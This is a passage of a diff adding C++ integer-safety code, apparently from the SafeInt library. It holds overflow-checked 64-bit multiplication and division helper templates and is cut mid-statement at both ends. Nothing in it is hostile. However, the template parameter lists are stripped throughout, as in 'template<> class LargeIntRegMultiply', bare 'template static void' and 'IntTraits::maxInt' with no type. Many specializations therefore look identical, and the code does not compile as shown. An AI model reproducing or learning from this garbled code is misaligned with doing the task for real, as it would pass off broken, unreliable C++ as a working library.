2^32 + aLow) * b + // => (aHigh * b * 2^32) + (aLow * b) + + aHigh = (unsigned __int32)(a >> 32); + aLow = (unsigned __int32)a; + + *pRet = 0; + + if (aHigh != 0) + { + *pRet = (unsigned __int64)aHigh * (unsigned __int64)b; + + unsigned __int64 tmp; + + if ((unsigned __int32)(*pRet >> 32) != 0) return false; + + *pRet <<= 32; + tmp = (unsigned __int64)aLow * (unsigned __int64)b; + *pRet += tmp; + + if (*pRet < tmp) return false; + + return true; + } + + *pRet = (unsigned __int64)aLow * (unsigned __int64)b; + return true; +#endif + } + + template + static void RegMultiplyThrow(const unsigned __int64& a, + unsigned __int32 b, + unsigned __int64* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet)) E::SafeIntOnOverflow(); +#else + unsigned __int32 aHigh, aLow; + + // Consider that a*b can be broken up into: + // (aHigh * 2^32 + aLow) * b + // => (aHigh * b * 2^32) + (aLow * b) + + aHigh = (unsigned __int32)(a >> 32); + aLow = (unsigned __int32)a; + + *pRet = 0; + + if (aHigh != 0) + { + *pRet = (unsigned __int64)aHigh * (unsigned __int64)b; + + unsigned __int64 tmp; + + if ((unsigned __int32)(*pRet >> 32) != 0) E::SafeIntOnOverflow(); + + *pRet <<= 32; + tmp = (unsigned __int64)aLow * (unsigned __int64)b; + *pRet += tmp; + + if (*pRet < tmp) E::SafeIntOnOverflow(); + + return; + } + + *pRet = (unsigned __int64)aLow * (unsigned __int64)b; + return; +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + // Intrinsic not needed + static bool RegMultiply(const unsigned __int64& a, signed __int32 b, unsigned __int64* pRet) SAFEINT_NOTHROW + { + if (b < 0 && a != 0) return false; + +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet); +#else + return LargeIntRegMultiply::RegMultiply(a, (unsigned __int32)b, pRet); +#endif + } + + template + static void RegMultiplyThrow(const unsigned __int64& a, signed __int32 b, unsigned __int64* pRet) SAFEINT_CPP_THROW + { + if (b < 0 && a != 0) E::SafeIntOnOverflow(); + +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet)) E::SafeIntOnOverflow(); +#else + LargeIntRegMultiply::template RegMultiplyThrow( + a, (unsigned __int32)b, pRet); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const unsigned __int64& a, signed __int64 b, unsigned __int64* pRet) SAFEINT_NOTHROW + { + if (b < 0 && a != 0) return false; + +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet); +#else + return LargeIntRegMultiply::RegMultiply(a, (unsigned __int64)b, pRet); +#endif + } + + template + static void RegMultiplyThrow(const unsigned __int64& a, signed __int64 b, unsigned __int64* pRet) SAFEINT_CPP_THROW + { + if (b < 0 && a != 0) E::SafeIntOnOverflow(); + +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet)) E::SafeIntOnOverflow(); +#else + LargeIntRegMultiply::template RegMultiplyThrow( + a, (unsigned __int64)b, pRet); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + // Devolves into ordinary 64-bit calculation + static bool RegMultiply(signed __int32 a, const unsigned __int64& b, signed __int32* pRet) SAFEINT_NOTHROW + { + unsigned __int32 bHigh, bLow; + bool fIsNegative = false; + + // Consider that a*b can be broken up into: + // (aHigh * 2^32 + aLow) * (bHigh * 2^32 + bLow) + // => (aHigh * bHigh * 2^64) + (aLow * bHigh * 2^32) + (aHigh * bLow * 2^32) + (aLow * bLow) + // aHigh == 0 implies: + // ( aLow * bHigh * 2^32 ) + ( aLow + bLow ) + // If the first part is != 0, fail + + bHigh = (unsigned __int32)(b >> 32); + bLow = (unsigned __int32)b; + + *pRet = 0; + + if (bHigh != 0 && a != 0) return false; + + if (a < 0) + { + a = (signed __int32)AbsValueHelper::method>::Abs(a); + fIsNegative = true; + } + + unsigned __int64 tmp = (unsigned __int32)a * (unsigned __int64)bLow; + + if (!fIsNegative) + { + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int32)tmp; + return true; + } + } + else + { + if (tmp <= (unsigned __int64)IntTraits::maxInt + 1) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + + return false; + } + + template + static void RegMultiplyThrow(signed __int32 a, const unsigned __int64& b, signed __int32* pRet) SAFEINT_CPP_THROW + { + unsigned __int32 bHigh, bLow; + bool fIsNegative = false; + + // Consider that a*b can be broken up into: + // (aHigh * 2^32 + aLow) * (bHigh * 2^32 + bLow) + // => (aHigh * bHigh * 2^64) + (aLow * bHigh * 2^32) + (aHigh * bLow * 2^32) + (aLow * bLow) + + bHigh = (unsigned __int32)(b >> 32); + bLow = (unsigned __int32)b; + + *pRet = 0; + + if (bHigh != 0 && a != 0) E::SafeIntOnOverflow(); + + if (a < 0) + { + a = (signed __int32)AbsValueHelper::method>::Abs(a); + fIsNegative = true; + } + + unsigned __int64 tmp = (unsigned __int32)a * (unsigned __int64)bLow; + + if (!fIsNegative) + { + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int32)tmp; + return; + } + } + else + { + if (tmp <= (unsigned __int64)IntTraits::maxInt + 1) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + // Becomes ordinary 64-bit multiplication, intrinsic not needed + static bool RegMultiply(unsigned __int32 a, const unsigned __int64& b, unsigned __int32* pRet) SAFEINT_NOTHROW + { + // Consider that a*b can be broken up into: + // (bHigh * 2^32 + bLow) * a + // => (bHigh * a * 2^32) + (bLow * a) + // In this case, the result must fit into 32-bits + // If bHigh != 0 && a != 0, immediate error. + + if ((unsigned __int32)(b >> 32) != 0 && a != 0) return false; + + unsigned __int64 tmp = b * (unsigned __int64)a; + + if ((unsigned __int32)(tmp >> 32) != 0) // overflow + return false; + + *pRet = (unsigned __int32)tmp; + return true; + } + + template + static void RegMultiplyThrow(unsigned __int32 a, + const unsigned __int64& b, + unsigned __int32* pRet) SAFEINT_CPP_THROW + { + if ((unsigned __int32)(b >> 32) != 0 && a != 0) E::SafeIntOnOverflow(); + + unsigned __int64 tmp = b * (unsigned __int64)a; + + if ((unsigned __int32)(tmp >> 32) != 0) // overflow + E::SafeIntOnOverflow(); + + *pRet = (unsigned __int32)tmp; + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(unsigned __int32 a, const signed __int64& b, unsigned __int32* pRet) SAFEINT_NOTHROW + { + if (b < 0 && a != 0) return false; + return LargeIntRegMultiply::RegMultiply(a, (unsigned __int64)b, pRet); + } + + template + static void RegMultiplyThrow(unsigned __int32 a, const signed __int64& b, unsigned __int32* pRet) SAFEINT_CPP_THROW + { + if (b < 0 && a != 0) E::SafeIntOnOverflow(); + + LargeIntRegMultiply::template RegMultiplyThrow( + a, (unsigned __int64)b, pRet); + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const signed __int64& a, const signed __int64& b, signed __int64* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyInt64(a, b, pRet); +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int64 tmp; + __int64 a1 = a; + __int64 b1 = b; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (b1 < 0) + { + bNegative = true; + b1 = (signed __int64)AbsValueHelper::method>::Abs(b1); + } + + if (LargeIntRegMultiply::RegMultiply( + (unsigned __int64)a1, (unsigned __int64)b1, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return true; + } + } + } + + return false; +#endif + } + + template + static void RegMultiplyThrow(const signed __int64& a, + const signed __int64& b, + signed __int64* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyInt64(a, b, pRet)) E::SafeIntOnOverflow(); +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int64 tmp; + __int64 a1 = a; + __int64 b1 = b; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (b1 < 0) + { + bNegative = true; + b1 = (signed __int64)AbsValueHelper::method>::Abs(b1); + } + + LargeIntRegMultiply::template RegMultiplyThrow( + (unsigned __int64)a1, (unsigned __int64)b1, &tmp); + + // The unsigned multiplication didn't overflow or we'd be in the exception handler + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return; + } + } + + E::SafeIntOnOverflow(); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const signed __int64& a, unsigned __int32 b, signed __int64* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyInt64(a, (signed __int64)b, pRet); +#else + bool aNegative = false; + unsigned __int64 tmp; + __int64 a1 = a; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (LargeIntRegMultiply::RegMultiply((unsigned __int64)a1, b, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return true; + } + } + } + + return false; +#endif + } + + template + static void RegMultiplyThrow(const signed __int64& a, unsigned __int32 b, signed __int64* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyInt64(a, (signed __int64)b, pRet)) E::SafeIntOnOverflow(); +#else + bool aNegative = false; + unsigned __int64 tmp; + __int64 a1 = a; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + LargeIntRegMultiply::template RegMultiplyThrow( + (unsigned __int64)a1, b, &tmp); + + // The unsigned multiplication didn't overflow + if (aNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return; + } + } + + E::SafeIntOnOverflow(); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const signed __int64& a, signed __int32 b, signed __int64* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyInt64(a, (signed __int64)b, pRet); +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int64 tmp; + __int64 a1 = a; + __int64 b1 = b; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (b1 < 0) + { + bNegative = true; + b1 = (signed __int64)AbsValueHelper::method>::Abs(b1); + } + + if (LargeIntRegMultiply::RegMultiply( + (unsigned __int64)a1, (unsigned __int32)b1, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return true; + } + } + } + + return false; +#endif + } + + template + static void RegMultiplyThrow(signed __int64 a, signed __int32 b, signed __int64* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyInt64(a, (signed __int64)b, pRet)) E::SafeIntOnOverflow(); +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int64 tmp; + + if (a < 0) + { + aNegative = true; + a = (signed __int64)AbsValueHelper::method>::Abs(a); + } + + if (b < 0) + { + bNegative = true; + b = (signed __int32)AbsValueHelper::method>::Abs(b); + } + + LargeIntRegMultiply::template RegMultiplyThrow( + (unsigned __int64)a, (unsigned __int32)b, &tmp); + + // The unsigned multiplication didn't overflow + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return; + } + } + + E::SafeIntOnOverflow(); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(signed __int32 a, const signed __int64& b, signed __int32* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + __int64 tmp; + + if (IntrinsicMultiplyInt64(a, b, &tmp)) + { + if (tmp > IntTraits::maxInt || tmp < IntTraits::minInt) + { + return false; + } + + *pRet = (__int32)tmp; + return true; + } + return false; +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int32 tmp; + __int64 b1 = b; + + if (a < 0) + { + aNegative = true; + a = (signed __int32)AbsValueHelper::method>::Abs(a); + } + + if (b1 < 0) + { + bNegative = true; + b1 = (signed __int64)AbsValueHelper::method>::Abs(b1); + } + + if (LargeIntRegMultiply::RegMultiply( + (unsigned __int32)a, (unsigned __int64)b1, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int32)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int32)IntTraits::maxInt) + { + *pRet = (signed __int32)tmp; + return true; + } + } + } + + return false; +#endif + } + + template + static void RegMultiplyThrow(signed __int32 a, const signed __int64& b, signed __int32* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + __int64 tmp; + + if (IntrinsicMultiplyInt64(a, b, &tmp)) + { + if (tmp > IntTraits::maxInt || tmp < IntTraits::minInt) + { + E::SafeIntOnOverflow(); + } + + *pRet = (__int32)tmp; + return; + } + E::SafeIntOnOverflow(); +#else + bool aNegative = false; + bool bNegative = false; + + unsigned __int32 tmp; + signed __int64 b2 = b; + + if (a < 0) + { + aNegative = true; + a = (signed __int32)AbsValueHelper::method>::Abs(a); + } + + if (b < 0) + { + bNegative = true; + b2 = (signed __int64)AbsValueHelper::method>::Abs(b2); + } + + LargeIntRegMultiply::template RegMultiplyThrow( + (unsigned __int32)a, (unsigned __int64)b2, &tmp); + + // The unsigned multiplication didn't overflow + if (aNegative ^ bNegative) + { + // Result must be negative + if (tmp <= (unsigned __int32)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int32)IntTraits::maxInt) + { + *pRet = (signed __int32)tmp; + return; + } + } + + E::SafeIntOnOverflow(); +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + // Leave this one as-is - will call unsigned intrinsic internally + static bool RegMultiply(const signed __int64& a, const unsigned __int64& b, signed __int64* pRet) SAFEINT_NOTHROW + { + bool aNegative = false; + + unsigned __int64 tmp; + __int64 a1 = a; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (LargeIntRegMultiply::RegMultiply( + (unsigned __int64)a1, (unsigned __int64)b, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return true; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return true; + } + } + } + + return false; + } + + template + static void RegMultiplyThrow(const signed __int64& a, + const unsigned __int64& b, + signed __int64* pRet) SAFEINT_CPP_THROW + { + bool aNegative = false; + unsigned __int64 tmp; + __int64 a1 = a; + + if (a1 < 0) + { + aNegative = true; + a1 = (signed __int64)AbsValueHelper::method>::Abs(a1); + } + + if (LargeIntRegMultiply::RegMultiply( + (unsigned __int64)a1, (unsigned __int64)b, &tmp)) + { + // The unsigned multiplication didn't overflow + if (aNegative) + { + // Result must be negative + if (tmp <= (unsigned __int64)IntTraits::minInt) + { + *pRet = SignedNegation::Value(tmp); + return; + } + } + else + { + // Result must be positive + if (tmp <= (unsigned __int64)IntTraits::maxInt) + { + *pRet = (signed __int64)tmp; + return; + } + } + } + + E::SafeIntOnOverflow(); + } +}; + +// In all of the following functions where LargeIntRegMultiply methods are called, +// we need to properly transition types. The methods need __int64, __int32, etc. +// but the variables being passed to us could be long long, long int, or long, depending on +// the compiler. Microsoft compiler knows that long long is the same type as __int64, but gcc doesn't + +template +class MultiplicationHelper +{ +public: + // T, U are unsigned __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isUint64); + unsigned __int64 t1 = t; + unsigned __int64 u1 = u; + return LargeIntRegMultiply::RegMultiply( + t1, u1, reinterpret_cast(&ret)); + } + + template + static void MultiplyThrow(const unsigned __int64& t, const unsigned __int64& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isUint64); + unsigned __int64 t1 = t; + unsigned __int64 u1 = u; + LargeIntRegMultiply::template RegMultiplyThrow( + t1, u1, reinterpret_cast(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is unsigned __int64 + // U is any unsigned int 32-bit or less + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 t1 = t; + return LargeIntRegMultiply::RegMultiply( + t1, (unsigned __int32)u, reinterpret_cast(&ret)); + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 t1 = t; + LargeIntRegMultiply::template RegMultiplyThrow( + t1, (unsigned __int32)u, reinterpret_cast(&ret)); + } +}; + +// converse of the previous function +template +class MultiplicationHelper +{ +public: + // T is any unsigned int up to 32-bit + // U is unsigned __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 u1 = u; + unsigned __int32 tmp; + + if (LargeIntRegMultiply::RegMultiply(t, u1, &tmp) && + SafeCastHelper::method>::Cast(tmp, ret)) + { + return true; + } + + return false; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 u1 = u; + unsigned __int32 tmp; + + LargeIntRegMultiply::template RegMultiplyThrow(t, u1, &tmp); + SafeCastHelper::method>::template CastThrow(tmp, + ret); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is unsigned __int64 + // U is any signed int, up to 64-bit + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 t1 = t; + return LargeIntRegMultiply::RegMultiply( + t1, (signed __int32)u, reinterpret_cast(&ret)); + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 t1 = t; + LargeIntRegMultiply::template RegMultiplyThrow( + t1, (signed __int32)u, reinterpret_cast(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is unsigned __int64 + // U is __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isInt64); + unsigned __int64 t1 = t; + __int64 u1 = u; + return LargeIntRegMultiply::RegMultiply( + t1, u1, reinterpret_cast(&ret)); + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64 && IntTraits::isInt64); + unsigned __int64 t1 = t; + __int64 u1 = u; + LargeIntRegMultiply::template RegMultiplyThrow( + t1, u1, reinterpret_cast(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is unsigned up to 32-bit + // U is __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64); + __int64 u1 = u; + unsigned __int32 tmp; + + if (LargeIntRegMultiply::RegMultiply((unsigned __int32)t, u1, &tmp) && + SafeCastHelper::method>::Cast(tmp, ret)) + { + return true; + } + + return false; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64); + __int64 u1 = u; + unsigned __int32 tmp; + + LargeIntRegMultiply::template RegMultiplyThrow((unsigned __int32)t, u1, &tmp); + SafeCastHelper::method>::template CastThrow(tmp, + ret); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is __int64 + // U is unsigned up to 32-bit + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64); + __int64 t1 = t; + return LargeIntRegMultiply<__int64, unsigned __int32>::RegMultiply( + t1, (unsigned __int32)u, reinterpret_cast<__int64*>(&ret)); + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64); + __int64 t1 = t; + LargeIntRegMultiply<__int64, unsigned __int32>::template RegMultiplyThrow( + t1, (unsigned __int32)u, reinterpret_cast<__int64*>(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T, U are __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isInt64); + __int64 t1 = t; + __int64 u1 = u; + return LargeIntRegMultiply<__int64, __int64>::RegMultiply(t1, u1, reinterpret_cast<__int64*>(&ret)); + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isInt64); + __int64 t1 = t; + __int64 u1 = u; + LargeIntRegMultiply<__int64, __int64>::template RegMultiplyThrow(t1, u1, reinterpret_cast<__int64*>(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is __int64 + // U is signed up to 32-bit + static bool Multiply(const T& t, U u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64); + __int64 t1 = t; + return LargeIntRegMultiply<__int64, __int32>::RegMultiply(t1, (__int32)u, reinterpret_cast<__int64*>(&ret)); + } + + template + static void MultiplyThrow(const __int64& t, U u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64); + __int64 t1 = t; + LargeIntRegMultiply<__int64, __int32>::template RegMultiplyThrow( + t1, (__int32)u, reinterpret_cast<__int64*>(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is signed up to 32-bit + // U is unsigned __int64 + static bool Multiply(T t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 u1 = u; + __int32 tmp; + + if (LargeIntRegMultiply<__int32, unsigned __int64>::RegMultiply((__int32)t, u1, &tmp) && + SafeCastHelper::method>::Cast(tmp, ret)) + { + return true; + } + + return false; + } + + template + static void MultiplyThrow(T t, const unsigned __int64& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64); + unsigned __int64 u1 = u; + __int32 tmp; + + LargeIntRegMultiply<__int32, unsigned __int64>::template RegMultiplyThrow((__int32)t, u1, &tmp); + SafeCastHelper::method>::template CastThrow(tmp, ret); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is __int64 + // U is unsigned __int64 + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + __int64 t1 = t; + unsigned __int64 u1 = u; + return LargeIntRegMultiply<__int64, unsigned __int64>::RegMultiply(t1, u1, reinterpret_cast<__int64*>(&ret)); + } + + template + static void MultiplyThrow(const __int64& t, const unsigned __int64& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + __int64 t1 = t; + unsigned __int64 u1 = u; + LargeIntRegMultiply<__int64, unsigned __int64>::template RegMultiplyThrow( + t1, u1, reinterpret_cast<__int64*>(&ret)); + } +}; + +template +class MultiplicationHelper +{ +public: + // T is signed, up to 32-bit + // U is __int64 + static bool Multiply(T t, const U& u, T& ret) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64); + __int64 u1 = u; + __int32 tmp; + + if (LargeIntRegMultiply<__int32, __int64>::RegMultiply((__int32)t, u1, &tmp) && + SafeCastHelper::method>::Cast(tmp, ret)) + { + return true; + } + + return false; + } + + template + static void MultiplyThrow(T t, const U& u, T& ret) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64); + __int64 u1 = u; + __int32 tmp; + + LargeIntRegMultiply<__int32, __int64>::template RegMultiplyThrow((__int32)t, u1, &tmp); + SafeCastHelper::method>::template CastThrow(tmp, ret); + } +}; + +enum DivisionState +{ + DivisionState_OK, + DivisionState_UnsignedSigned, + DivisionState_SignedUnsigned32, + DivisionState_SignedUnsigned64, + DivisionState_SignedUnsigned, + DivisionState_SignedSigned +}; + +template +class DivisionMethod +{ +public: + enum + { + method = + (SafeIntCompare::isBothUnsigned + ? DivisionState_OK + : (!IntTraits::isSigned && IntTraits::isSigned) + ? DivisionState_UnsignedSigned + : (IntTraits::isSigned && IntTraits::isUint32 && IntTraits::isLT64Bit) + ? DivisionState_SignedUnsigned32 + : (IntTraits::isSigned && IntTraits::isUint64) + ? DivisionState_SignedUnsigned64 + : (IntTraits::isSigned && !IntTraits::isSigned) ? DivisionState_SignedUnsigned + : DivisionState_SignedSigned) + }; +}; + +template +class DivisionHelper; + +template +class DivisionHelper +{ +public: + static SafeIntError Divide(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + result = (T)(t / u); + return SafeIntNoError; + } + + template + static void DivideThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + if (t == 0) + { + result = 0; + return; + } + + result = (T)(t / u); + } +}; + +template +class DivisionHelper +{ +public: + static SafeIntError Divide(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + if (u > 0) + { + result = (T)(t / u); + return SafeIntNoError; + } + + // it is always an error to try and divide an unsigned number by a negative signed number + // unless u is bigger than t + if (AbsValueHelper::method>::Abs(u) > t) + { + result = 0; + return SafeIntNoError; + } + + return SafeIntArithmeticOverflow; + } + + template + static void DivideThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + if (t == 0) + { + result = 0; + return; + } + + if (u > 0) + { + result = (T)(t / u); + return; + } + + // it is always an error to try and divide an unsigned number by a negative signed number + // unless u is bigger than t + if (AbsValueHelper::method>::Abs(u) > t) + { + result = 0; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class DivisionHelper +{ +public: + static SafeIntError Divide(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + // Test for t > 0 + // If t < 0, must explicitly upcast, or implicit upcast to ulong will cause errors + // As it turns out, 32-bit division is about twice as fast, which justifies the extra conditional + + if (t > 0) + result = (T)(t / u); + else + result = (T)((__int64)t / (__int64)u); + + return SafeIntNoError; + } + + template + static void DivideThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) + { + E::SafeIntOnDivZero(); + } + + if (t == 0) + { + result = 0; + return; + } + + // Test for t > 0 + // If t < 0, must explicitly upcast, or implicit upcast to ulong will cause errors + // As it turns out, 32-bit division is about twice as fast, which justifies the extra conditional + + if (t > 0) + result = (T)(t / u); + else + result = (T)((__int64)t / (__int64)u); + } +}; + +template +class DivisionHelper +{ +public: + static SafeIntError Divide(const T& t, const unsigned __int64& u, T& result) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isUint64); + + if (u == 0) + { + return SafeIntDivideByZero; + } + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + if (u <= (unsigned __int64)IntTraits::maxInt) + { + // Else u can safely be cast to T + if (CompileConst::Value()) + result = (T)((int)t / (int)u); + else + result = (T)((__int64)t / (__int64)u); + } + else // Corner case + if (t == IntTraits::minInt && u == (unsigned __int64)IntTraits::minInt) + { + // Min int divided by it's own magnitude is -1 + result = -1; + } + else + { + result = 0; + } + return SafeIntNoError; + } + + template + static void DivideThrow(const T& t, const unsigned __int64& u, T& result) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isUint64); + + if (u == 0) + { + E::SafeIntOnDivZero(); + } + + if (t == 0) + { + result = 0; + return; + } + + if (u <= (unsigned __int64)IntTraits::maxInt) + { + // Else u can safely be cast to T + if (CompileConst::Value()) + result = (T)((int)t / (int)u); + else + result = 